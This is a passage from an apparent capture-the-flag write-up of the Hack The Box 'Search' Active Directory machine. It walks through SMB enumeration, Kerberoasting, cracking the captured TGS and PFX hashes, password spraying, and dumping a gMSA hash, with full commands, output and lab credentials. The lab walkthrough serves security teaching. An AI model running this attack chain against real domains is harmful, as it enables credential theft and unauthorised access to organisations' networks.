  dax.santiago                       Dc        0  Tue Apr  7 14:20:08 2020
  Eddie.Stevens                      Dc        0  Fri Jul 31 07:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr  9 16:04:11 2020
  Edith.Walls                        Dc        0  Fri Jul 31 08:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 14:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 14:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 10:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 14:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 09:01:06 2020
  payton.harmon                      Dc        0  Thu Apr  9 16:11:39 2020
  Reginald.Morton                    Dc        0  Fri Jul 31 07:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr  7 14:10:25 2020
  Savanah.Velazquez                  Dc        0  Fri Jul 31 08:21:42 2020
  sierra.frye                        Dc        0  Wed Nov 17 20:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  9 16:14:26 2020

\abril.suarez
  .                                  Dc        0  Tue Apr  7 14:12:58 2020
  ..                                 Dc        0  Tue Apr  7 14:12:58 2020
  Desktop                           DRc        0  Fri Jul 31 08:19:29 2020
  Documents                         DRc        0  Fri Jul 31 08:19:33 2020
  Downloads                         DRc        0  Fri Jul 31 08:19:30 2020

...

\frederick.cuevas\Downloads
NT_STATUS_ACCESS_DENIED listing \frederick.cuevas\Downloads\*

\hope.sharp\Desktop
  .                                 DRc        0  Thu Apr  9 10:35:49 2020
  ..                                DRc        0  Thu Apr  9 10:35:49 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      282  Thu Apr  9 10:35:00 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 10:35:38 2020

\hope.sharp\Documents
  .                                 DRc        0  Thu Apr  9 10:35:50 2020
  ..                                DRc        0  Thu Apr  9 10:35:50 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 10:35:51 2020
  desktop.ini                      AHSc      402  Thu Apr  9 10:35:03 2020

\hope.sharp\Downloads
  .                                 DRc        0  Thu Apr  9 10:35:49 2020
  ..                                DRc        0  Thu Apr  9 10:35:49 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      282  Thu Apr  9 10:35:02 2020

\jayla.roberts\Desktop
NT_STATUS_ACCESS_DENIED listing \jayla.roberts\Desktop\*

...

\Savanah.Velazquez\Downloads
NT_STATUS_ACCESS_DENIED listing \Savanah.Velazquez\Downloads\*

\sierra.frye\Desktop
  .                                 DRc        0  Wed Nov 17 20:08:00 2021
  ..                                DRc        0  Wed Nov 17 20:08:00 2021
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      282  Fri Jul 31 10:42:15 2020
  Microsoft Edge.lnk                 Ac     1450  Tue Apr  7 08:28:05 2020
  user.txt                           Ac       33  Wed Nov 17 19:55:27 2021

\sierra.frye\Documents
NT_STATUS_ACCESS_DENIED listing \sierra.frye\Documents\*

\sierra.frye\Downloads
NT_STATUS_ACCESS_DENIED listing \sierra.frye\Downloads\*

\trace.ryan\Desktop
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Desktop\*

\trace.ryan\Documents
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Documents\*

\trace.ryan\Downloads
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Downloads\*

\hope.sharp\Desktop\$RECYCLE.BIN
  .                                DHSc        0  Thu Apr  9 10:35:49 2020
  ..                               DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      129  Thu Apr  9 10:35:49 2020

\hope.sharp\Documents\$RECYCLE.BIN
  .                                DHSc        0  Thu Apr  9 10:35:51 2020
  ..                               DHSc        0  Thu Apr  9 10:35:51 2020
  desktop.ini                      AHSc      129  Thu Apr  9 10:35:51 2020

\hope.sharp\Downloads\$RECYCLE.BIN
  .                                DHSc        0  Thu Apr  9 10:35:49 2020
  ..                               DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      129  Thu Apr  9 10:35:50 2020

\sierra.frye\Desktop\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:03:59 2020
  ..                               DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:00 2020
smb: \> get sierra.frye\Desktop\user.txt
NT_STATUS_ACCESS_DENIED opening remote file \sierra.frye\Desktop\user.txt

All of this leads to nowhere except that we know ‘sierra.frye’ has the user flag, so this user is probably the next step to a lateral movement.

Kerberoasting

Given the users we got from enum4linux, let's use it and attempt to get the SPN tickets:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ impacket-GetUserSPNs -request -usersfile dom_userlist.txt -dc-ip research.search.htb 'search.htb/hope.sharp:IsolationIsKey?' 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$SEARCH.HTB$*krbtgt*$0820014f34b455d3c07b50dd$98d076c059a11e9b8f0995e1fe065a5965a3053317321fc1ca2c82136a129aa1ead67b05196d537eec67e44e9a035862e7e5f3c3bace1ecc3f6ee096d61053ca55496b16c5d39043c4801b7fd931d0598fbe4dbc14552cd71ac1928a833ae045ebf4abef2cf7bc8a4bc00a58309a7548018d28882818dd446349e4c712cf0c05a191f0f2ceb3f60674fb5202f9cf7e7fa23241ff97f8a6c19f7d6ad9b98502f064987d79cf21c3c55ea52d4ead445c87f21a7ebbe8349ae8e05330e7d5cb40150435b707e28b17b4024e09ee16e12d38b6c921d9f6d90ecef10a1aedc505180fc1b6873efd76fcdc7069bb11f4675912964039229fa988b80225afc77fd93eea180f59b639f4dc9fa99d47aa40ccc77ce665a543239007cac7ebd53d055dc28e89c6694727f978577ac2b7076854aacb7b6e308ab1012023db472f36a7f393adae99d12e34be65ad854e47dabbae6c7f0c505e46cc0bebbbc3e0717b9f4cf567b0b830521d76670ea1ef6ed843db43918ece9e1c0bab07000d09ed800f07edf2a2d78cdb147778ff248c2a159eceecd89cfd362b9edb083d74f66afbc29459915ba431cd4a837dd790bd8f7ef3dd67c0f697ad816c14eb1542b14390fd79a486788894827098f191aa54b0c85d33af817e17d9baaf3556bb006b521ba7c99f7e4e11e4ce09a773bc43eb8ffba1053fa24dbc05d0f600d75e4b298115ff2820538ac1e6f7b6611b5e46f95e81985d326a0b51333b591564e898a1bb3e8fb2f9a27744d737b80291179d931329986748166798e861e552470514756cfc9395fcd55294f2a096a0f1a915985e6691fbd95e10b834ea39de65b296d75f6dedf5a062cac4407ab427a9ab2729c83e866af231daefd1451af59bfe798f0202a891aac9c630bbcf5ca8f68023caf8cb1cd2eea3d8cbd071580692b26de02dd13023dd4be4a47c9449f8d2596bc432a49781e50b15d72eca74bb8d8e81ce24895709adde79cc4488ae29a6f1fdb5e2f5e57192a8138b4df17e81a4df74ee64529b00b6ae83519b92da8ec0f479b294caf6fe885ec48db5c52e953e98e9358f4901f463b0ff47915523ccb4fc7d67d5b4e658518932236340b25c5f0b6fd51072f27a06de333f65737ac0db2cfd3c0d2681e6bb1f59daebf75f3d8e5a380bdc9eecbfe83e28e7ebbd3267401c56888fbdba265aeb9ff9dd005355e07648583996fdcf83783cb5701bdbaf45790467859b6b6dcee02e4a3bb5c318fa666230605fa228a500a239c1113ceb8171609a24d657f8c91403c9622c209577db4cbf8c7a45015f2e2fe174e2ce47ca0d2baec84fa3999fe2f8e750167cf3bff4348fcf03b2a853e72d261b40765427a4ecf0bb2355f8dd94a18bbe20e304cc012a01e9e9c43de198f23e4174ddc582ad4330fbdc4047dbd341be0daaa778dc81b88df83d16d580d7f675e9d173dafeb4df97da79c352cc9936c560d760806071bf7cdce872975c58eed1bf1777dae42ebdb177ffe691febb74fd5000502b272c4c2f292488
[-] Principal: Santino.Benjamin - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
...
[-] Principal: Jordan.Gregory - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*web_svc$SEARCH.HTB$web_svc*$04c3e36f83a5b31eb7372497c08833db$7cc4bec06406f0d77106c29ad0801fc3d3b4109e49bd6df91628324f50f58a3f957bd9606144bce79981b7d56693e547fa5eabdd53dcc1cac8695412ddb6ddf4b6b6448fe8ae274701768ff640d287002ed28efd18e3343ecabb2670e1856ea481ea45f7a399d334fdd1304d6b15b8c9337cd606500f61ce539d142697613920bced58d974fd9afbea0d3e2c6f8ea808559d3a2957dceadb619d21e3be3677d6b4acfb989561cc2420a99eb7f3ec12b318cd260cc8e5dcfb04266e03a6860c0d625d06b4a76d9a30c768a36fe92079930509d371b5d3867508b6689aaacc6e5bf4036d9de8170752207606352c8d57eb646a25d2d4a8abd0ae4c3597cb008256de9aac3269fb3ca1aa2e416661ee3bea1b019b804710d8c1f9b266679ca914abadcf9d71f66e42e8debdca33b26cbb4c865b2f57543e5b55f5406469ba0830e6890fa7c228448003812f4adb00de86b5c9b2d708323cc2f55609cab06a0b0bbad4079f931a210bebb6adf67899dc3ca773b36840e9fc25a14ab7ec21061f5701f005704661fbf3f588bbfc2a2b12b293a72aa3ffb1680048f6c77b494bf6b0e3a212d341964fcc8cc5d99081a3b5bf0f2f687b967fa87a20ad8fd9a7c9e910612c316a3d0a8494f230cfdef0ab26e6d3809bcb4f65ea601d6200b8f62a2018b422bcafe1a6324ec2102a3852d1a7778695081664c91a632a50b0f159e5b77b5be26832b6724a8f7b1334c87e217767d1963fe565b658b965cf97caf492f530b5ec3789ad31985d3446c5739e3d515d197bdf1a6e238facec5054a262e8706a9fe840a797ecfc10ae7e4a90cd4604dbe24ae13890ef6e8e84d62ca319ad546d73e7ec22c99a50c6210582c7d712783a541e47bc3b83203ce2c2a15419f187700e2f9e258a306749bd51c8be6dc72722a477687d8176e2ff205bbc467cdaa55c2d2d0c51ffde190e302e4ca58acd42f907b8bc8efd01332ddbd91910e34fd3ceac6bad7eb5cfc517b70e0428a25cedbce8155e511b365d3d21634ef10352fecb2b5aa22f0ddf0ad4ee4841d104b7f01a27d0e7e3c3816cb0255ee6833a37352d2e6961e24c6fd120fc8b082aff3ffc25cac65449527b153abc1500666d236d49c3a0238239a1282ac6750a6519fad5d909566692f21fd819a81674e6bf85253200f3a88a8faf2eb3c766058b3c25b8d3aa300a91b138401f315b2b5e79094fadc78871eacc8182e6a3e26a3bcb5273bbcca0a0cd88b88ff7355e656e76ba6d5cf7bb62661b77296ff203712c7d46622e6a0dc6d9a38c390a82a7efe27380ff75ac0936fbae297c7fd9830312a92adeebbf95341fbe53fce4ce55a27fb0e95795e6d5fa3fac26a34de0cb63eec71c07f56cd3efef4e239649a67359f37713d9ed94199e8df3026bfb9418af9927d92b7ce84cda6bffd7960afcffbc96fcd62e2e3fce79c1a76710433ae71ef70b90a9a6baa5d469b2f8
[-] Principal: Tristan.Davies - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal:  - Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Now with the SPN ticket for web_svc, let's try and crack this:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ echo '$krb5tgs$23$*web_svc$SEARCH.HTB$web_svc*$04c3e36f83a5b31eb7372497c08833db$7cc4bec06406f0d77106c29ad0801fc3d3b4109e49bd6df91628324f50f58a3f957bd9606144bce79981b7d56693e547fa5eabdd53dcc1cac8695412ddb6ddf4b6b6448fe8ae274701768ff640d287002ed28efd18e3343ecabb2670e1856ea481ea45f7a399d334fdd1304d6b15b8c9337cd606500f61ce539d142697613920bced58d974fd9afbea0d3e2c6f8ea808559d3a2957dceadb619d21e3be3677d6b4acfb989561cc2420a99eb7f3ec12b318cd260cc8e5dcfb04266e03a6860c0d625d06b4a76d9a30c768a36fe92079930509d371b5d3867508b6689aaacc6e5bf4036d9de8170752207606352c8d57eb646a25d2d4a8abd0ae4c3597cb008256de9aac3269fb3ca1aa2e416661ee3bea1b019b804710d8c1f9b266679ca914abadcf9d71f66e42e8debdca33b26cbb4c865b2f57543e5b55f5406469ba0830e6890fa7c228448003812f4adb00de86b5c9b2d708323cc2f55609cab06a0b0bbad4079f931a210bebb6adf67899dc3ca773b36840e9fc25a14ab7ec21061f5701f005704661fbf3f588bbfc2a2b12b293a72aa3ffb1680048f6c77b494bf6b0e3a212d341964fcc8cc5d99081a3b5bf0f2f687b967fa87a20ad8fd9a7c9e910612c316a3d0a8494f230cfdef0ab26e6d3809bcb4f65ea601d6200b8f62a2018b422bcafe1a6324ec2102a3852d1a7778695081664c91a632a50b0f159e5b77b5be26832b6724a8f7b1334c87e217767d1963fe565b658b965cf97caf492f530b5ec3789ad31985d3446c5739e3d515d197bdf1a6e238facec5054a262e8706a9fe840a797ecfc10ae7e4a90cd4604dbe24ae13890ef6e8e84d62ca319ad546d73e7ec22c99a50c6210582c7d712783a541e47bc3b83203ce2c2a15419f187700e2f9e258a306749bd51c8be6dc72722a477687d8176e2ff205bbc467cdaa55c2d2d0c51ffde190e302e4ca58acd42f907b8bc8efd01332ddbd91910e34fd3ceac6bad7eb5cfc517b70e0428a25cedbce8155e511b365d3d21634ef10352fecb2b5aa22f0ddf0ad4ee4841d104b7f01a27d0e7e3c3816cb0255ee6833a37352d2e6961e24c6fd120fc8b082aff3ffc25cac65449527b153abc1500666d236d49c3a0238239a1282ac6750a6519fad5d909566692f21fd819a81674e6bf85253200f3a88a8faf2eb3c766058b3c25b8d3aa300a91b138401f315b2b5e79094fadc78871eacc8182e6a3e26a3bcb5273bbcca0a0cd88b88ff7355e656e76ba6d5cf7bb62661b77296ff203712c7d46622e6a0dc6d9a38c390a82a7efe27380ff75ac0936fbae297c7fd9830312a92adeebbf95341fbe53fce4ce55a27fb0e95795e6d5fa3fac26a34de0cb63eec71c07f56cd3efef4e239649a67359f37713d9ed94199e8df3026bfb9418af9927d92b7ce84cda6bffd7960afcffbc96fcd62e2e3fce79c1a76710433ae71ef70b90a9a6baa5d469b2f8' > web_svc-krb
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt web_svc-krb 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@3ONEmillionbaby (?)     
1g 0:00:00:11 DONE (2022-04-22 14:52) 0.08960g/s 1029Kp/s 1029Kc/s 1029KC/s @4208891ncv..@#alexandra$&
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Once we cracked this SPN ticket, we had no success as it has the "same level of access" as hope.sharp. Let's attempt to use it for password spraying and see if an account has that same password:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ crackmapexec smb search.htb -d SEARCH -u dom_userlist.txt -p '@3ONEmillionbaby' --continue-on-success
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:SEARCH) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [-] SEARCH\Administrator:@3ONEmillionbaby STATUS_LOGON_FAILURE 
...
SMB         search.htb      445    RESEARCH         [-] SEARCH\Marshall.Skinner:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         search.htb      445    RESEARCH         [+] SEARCH\Edgar.Jacobs:@3ONEmillionbaby 
SMB         search.htb      445    RESEARCH         [-] SEARCH\Elisha.Watts:@3ONEmillionbaby STATUS_LOGON_FAILURE
...
SMB         search.htb      445    RESEARCH         [-] SEARCH\:@3ONEmillionbaby STATUS_LOGON_FAILURE

We found another user with the same password as web_svc: Edgar.Jacobs:@3ONEmillionbaby

Let's see what can we see with this account:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d SEARCH 
[+] IP: search.htb:445	Name: unknown                                           
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	helpdesk                                          	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	RedirectedFolders$                                	READ, WRITE	
	SYSVOL                                            	READ ONLY	Logon server share 
                                                                                                                                                                         

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\edgar.jacobs'%'@3ONEmillionbaby'
Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\
smb: \edgar.jacobs\> ls
  .                                  Dc        0  Thu Apr  9 16:04:11 2020
  ..                                 Dc        0  Thu Apr  9 16:04:11 2020
  Desktop                           DRc        0  Mon Aug 10 06:02:16 2020
  Documents                         DRc        0  Mon Aug 10 06:02:17 2020
  Downloads                         DRc        0  Mon Aug 10 06:02:17 2020

		3246079 blocks of size 4096. 374459 blocks available
smb: \edgar.jacobs\> ls Desktop\
  .                                 DRc        0  Mon Aug 10 06:02:16 2020
  ..                                DRc        0  Mon Aug 10 06:02:16 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 16:05:29 2020
  desktop.ini                      AHSc      282  Mon Aug 10 06:02:16 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 16:05:03 2020
  Phishing_Attempt.xlsx              Ac    23130  Mon Aug 10 06:35:44 2020

		3246079 blocks of size 4096. 374459 blocks available
smb: \edgar.jacobs\> cd ..
smb: \> get edgar.jacobs\Desktop\Phishing_Attempt.xlsx 
getting file \edgar.jacobs\Desktop\Phishing_Attempt.xlsx of size 23130 as edgar.jacobs\Desktop\Phishing_Attempt.xlsx (124.8 KiloBytes/sec) (average 124.8 KiloBytes/sec)
smb: \> quit

As you get to see, there is a "phishing" related spreadsheet we need to inspect and for this I did not go fancy and simply used Google Sheets:

This is what seems to be a good password list to work with and test them out once more after composing a new list:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ crackmapexec smb search.htb -d SEARCH -u phishUser -p phishPass --continue-on-success     
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:SEARCH) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [-] SEARCH\Payton.Harmon:;;36!cried!INDIA!year!50;; STATUS_LOGON_FAILURE 
...
SMB         search.htb      445    RESEARCH         [-] SEARCH\Sierra.Frye:~~27%when%VILLAGE%full%00~~ STATUS_LOGON_FAILURE 
SMB         search.htb      445    RESEARCH         [+] SEARCH\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18 
SMB         search.htb      445    RESEARCH         [-] SEARCH\Sierra.Frye:==95~pass~QUIET~austria~77== STATUS_LOGON_FAILURE 
...
SMB         search.htb      445    RESEARCH         [-] SEARCH\Vincent.Sutton:**24&moment&BRAZIL&members&66** STATUS_LOGON_FAILURE

And we just found the following: SEARCH\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18

Let's attempt to use this account while first testing it through smbmap:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d SEARCH     
[+] IP: search.htb:445	Name: unknown                                           
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	helpdesk                                          	NO ACCESS	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	RedirectedFolders$                                	READ, WRITE	
	SYSVOL                                            	READ ONLY	Logon server share 

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\Sierra.Frye'%'$$49=wide=STRAIGHT=jordan=28$$18'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Fri Apr 22 17:00:50 2022
  ..                                 Dc        0  Fri Apr 22 17:00:50 2022
  abril.suarez                       Dc        0  Tue Apr  7 14:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 09:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 08:35:32 2020
  belen.compton                      Dc        0  Tue Apr  7 14:32:31 2020
  Cameron.Melendez                   Dc        0  Fri Jul 31 08:37:36 2020
  chanel.bell                        Dc        0  Tue Apr  7 14:15:09 2020
  Claudia.Pugh                       Dc        0  Fri Jul 31 09:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 08:02:04 2020
  dax.santiago                       Dc        0  Tue Apr  7 14:20:08 2020
  Eddie.Stevens                      Dc        0  Fri Jul 31 07:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr  9 16:04:11 2020
  Edith.Walls                        Dc        0  Fri Jul 31 08:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 14:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 14:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 10:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 14:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 09:01:06 2020
  payton.harmon                      Dc        0  Thu Apr  9 16:11:39 2020
  Reginald.Morton                    Dc        0  Fri Jul 31 07:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr  7 14:10:25 2020
  Savanah.Velazquez                  Dc        0  Fri Jul 31 08:21:42 2020
  sierra.frye                        Dc        0  Wed Nov 17 20:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  9 16:14:26 2020

		3246079 blocks of size 4096. 374322 blocks available
smb: \> recurse 
smb: \> ls sierra.frye\
  .                                  Dc        0  Wed Nov 17 20:01:46 2021
  ..                                 Dc        0  Wed Nov 17 20:01:46 2021
  Desktop                           DRc        0  Wed Nov 17 20:08:00 2021
  Documents                         DRc        0  Fri Jul 31 10:42:19 2020
  Downloads                         DRc        0  Fri Jul 31 10:45:36 2020
  user.txt                           Ac       33  Wed Nov 17 19:55:27 2021

\sierra.frye\Desktop
  .                                 DRc        0  Wed Nov 17 20:08:00 2021
  ..                                DRc        0  Wed Nov 17 20:08:00 2021
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      282  Fri Jul 31 10:42:15 2020
  Microsoft Edge.lnk                 Ac     1450  Tue Apr  7 08:28:05 2020
  user.txt                          ARc       34  Fri Apr 22 09:32:25 2022

\sierra.frye\Documents
  .                                 DRc        0  Fri Jul 31 10:42:19 2020
  ..                                DRc        0  Fri Jul 31 10:42:19 2020
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:04:01 2020
  desktop.ini                      AHSc      402  Fri Jul 31 10:42:19 2020

\sierra.frye\Downloads
  .                                 DRc        0  Fri Jul 31 10:45:36 2020
  ..                                DRc        0  Fri Jul 31 10:45:36 2020
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:04:01 2020
  Backups                           DHc        0  Mon Aug 10 16:39:17 2020
  desktop.ini                      AHSc      282  Fri Jul 31 10:42:18 2020

\sierra.frye\Desktop\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:03:59 2020
  ..                               DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:00 2020

\sierra.frye\Documents\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:04:01 2020
  ..                               DHSc        0  Tue Apr  7 14:04:01 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:01 2020

\sierra.frye\Downloads\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:04:01 2020
  ..                               DHSc        0  Tue Apr  7 14:04:01 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:01 2020

\sierra.frye\Downloads\Backups
  .                                 DHc        0  Mon Aug 10 16:39:17 2020
  ..                                DHc        0  Mon Aug 10 16:39:17 2020
  search-RESEARCH-CA.p12             Ac     2643  Fri Jul 31 11:04:11 2020
  staff.pfx                          Ac     4326  Mon Aug 10 16:39:17 2020

		3246079 blocks of size 4096. 374322 blocks available
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> get user.txt 
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \sierra.frye\Desktop\> cd ..\Downloads\Backups\
smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12 
getting file \sierra.frye\Downloads\Backups\search-RESEARCH-CA.p12 of size 2643 as search-RESEARCH-CA.p12 (15.0 KiloBytes/sec) (average 7.5 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> get staff.pfx 
getting file \sierra.frye\Downloads\Backups\staff.pfx of size 4326 as staff.pfx (25.0 KiloBytes/sec) (average 13.2 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> quit

At this point, not only we found the user flag without a shell but we also found a PKCS12 certificate file (PFX file).

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ cat user.txt 
ab0459********************bea8e6

While trying to see the content of this certificate file, we cannot as it seems to have been created with a passphrase to decrypt the private key.

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ openssl pkcs12 -info -in staff.pfx 
Enter Import Password:
Can't read Password
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ pfx2john staff.pfx > staff_pfx
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt staff_pfx
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy        (staff.pfx)     
1g 0:00:03:39 DONE (2022-04-22 17:16) 0.004549g/s 24952p/s 24952c/s 24952C/s misssnail..missnona16
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ pfx2john search-RESEARCH-CA.p12 > search_p12

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt search_p12
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy        (search-RESEARCH-CA.p12)     
1g 0:00:03:41 DONE (2022-04-22 17:24) 0.004518g/s 24782p/s 24782c/s 24782C/s misssnail..missnona16
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Once we have this passphrase and inspect the certificate, we see this is a user certificate and with the CA certificate file (of course, it is a PKCS12 certificate file). Now, with these certificates, we can try and access which is what this certificate is for:

To use these certificate files, you will have to import them into the browser.

This will give us a Powershell session on the browser. Here we will try to get and change the Execution Policy and load PowerView into memory for future use:

Privilege Escalation

While enumerating directories we bump into a Home directory from what seems to be a group managed service account (GMSA):

PS C:\users> ls

    Directory: C:\users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        3/23/2020   7:20 AM                .NET v4.5                                                             
d-----        3/23/2020   7:20 AM                .NET v4.5 Classic                                                     
d-----       12/20/2021   8:34 AM                Administrator                                                         
d-----        7/31/2020  10:01 AM                BIR-ADFS-GMSA$                                                        
d-r---        3/23/2020   7:07 AM                Public                                                                
d-----        4/23/2022   4:23 AM                Sierra.Frye                                                           
d-----        8/11/2020   8:45 AM                WSEnrollmentServer                                                    

PS C:\users>

Bloodhound

With this account, we should try and enumerate the domain a little more using Bloodhound:

When we try to dump the gMSA password with Sierra.Frye we get such hash:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ python3 /opt/gMSADumper/gMSADumper.py -l search.htb -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
Users or groups who can read password for BIR-ADFS-GMSA$:
 > ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

Back to Powershell, we will try to use the 'ManagedPassword' and change Tristan.Davies password:

PS C:\users> Get-ADServiceAccount -Identity BIR-ADFS-GMSA$ -Properties 'msDS-ManagedPassword'


DistinguishedName    : CN=BIR-ADFS-GMSA,CN=Managed Service Accounts,DC=search,DC=htb
Enabled              : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name                 : BIR-ADFS-GMSA
ObjectClass          : msDS-GroupManagedServiceAccount
ObjectGUID           : 48cd6c5b-56cb-407e-ac2b-7294b5a44857
SamAccountName       : BIR-ADFS-GMSA$
SID                  : S-1-5-21-271492789-1610487937-1871574529-1299
UserPrincipalName    : 
 

